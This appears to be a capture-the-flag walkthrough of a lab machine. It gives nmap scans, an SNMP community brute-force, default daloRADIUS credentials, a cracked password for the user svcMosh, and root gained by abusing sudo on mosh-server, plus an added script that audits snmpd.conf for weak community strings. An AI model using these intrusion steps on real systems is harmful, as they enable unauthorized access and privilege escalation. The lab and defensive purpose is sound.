-
I start with a scan of all open TCP ports, then continue with a scan of the versions and technologies running on the open ports found.
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.48 -oG scan
nmap -p22,80 -sCV -Pn 10.10.11.48 -oN ports

-
After searching the web service for files and directories I can’t find anything, so I decide to search for open UDP ports.
nmap -p- --open --min-rate 5000 -Pn -sU 10.10.11.48 -oG scan
nmap -p161 -sUCV -Pn 10.10.11.48


-
When I find an SNMP service running on port 161, I brute-force the community strings and use them to walk the OIDs.
onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 10.10.11.48
snmpwalk -v2c -c public 10.10.11.48
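
The defensive counterpart of this step, as an added example that is not part of the original write-up: a POSIX shell audit of a net-snmp snmpd.conf that flags guessable community strings, such as the public one that answered here, and communities with no source restriction. The sample config and the short weak-name list are constructed for the demonstration.

```bash
# Constructed sample snmpd.conf (not taken from the host in this write-up).
SAMPLE_CONF='# constructed sample
agentAddress udp:161
rocommunity public
rocommunity m0n1t0r-7fQ2 10.0.5.10
rwcommunity private 127.0.0.1
com2sec readonly default public
com2sec -Cn ctx1 ops 10.0.5.0/24 Zx9-ops-ro
rocommunity6 s3cr3t-long-string
'

# Assumption: a short demo list; a real audit would load the same kind of
# wordlist that a community brute-force uses.
WEAK_NAMES='public private community snmp manager admin'

# Reads snmpd.conf text on stdin and prints one finding per line as
# <line-number>:<WEAK|OPEN>:<community>
#   WEAK = community name is in the guessable list
#   OPEN = no source given, or source "default" (any host may query)
audit_snmpd_conf() {
  awk -v weak="$WEAK_NAMES" '
    BEGIN { n = split(weak, w, " "); for (i = 1; i <= n; i++) bad[w[i]] = 1 }
    /^[ \t]*#/ || NF == 0 { next }
    # rocommunity / rwcommunity (and the IPv6 forms): COMMUNITY [SOURCE ...]
    $1 ~ /^r[ow]community6?$/ { comm = $2; src = $3 }
    # com2sec [-Cn CONTEXT] SECNAME SOURCE COMMUNITY
    $1 == "com2sec" || $1 == "com2sec6" {
      o = ($2 == "-Cn") ? 2 : 0
      src = $(3 + o); comm = $(4 + o)
    }
    comm != "" {
      if (comm in bad) print NR ":WEAK:" comm
      if (src == "" || src == "default") print NR ":OPEN:" comm
      comm = ""; src = ""
    }
  '
}

# Run against the constructed sample; on a real host, feed it the agent config.
printf '%s' "$SAMPLE_CONF" | audit_snmpd_conf
```

Any WEAK or OPEN finding on an agent reachable from untrusted networks is worth fixing: rename the community, pin it to the monitoring host's address, or move to SNMPv3.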


-
Within the OIDs I find a possible host and add it to /etc/hosts. Then I look for information about daloRADIUS and find both the login path and the default credentials.

-
With these credentials I am able to log in and list the users. I try to crack the password hash with CrackStation and get the password of the user svcMosh: underwaterfriends.

-
Thanks to these credentials I am able to log in via SSH and read the first flag.

-
I list the commands that I can run as another user or with elevated permissions and I find a binary.

-
After searching for information I see that I can start a server as root and then connect to it.
sudo /usr/bin/mosh-server new -i 127.0.0.1 -p 60003
MOSH_KEY=Diw7S+M9SdRft2HnB2OGIg mosh-client 127.0.0.1 60003
-
Thanks to this, I am root and I can read the second flag.
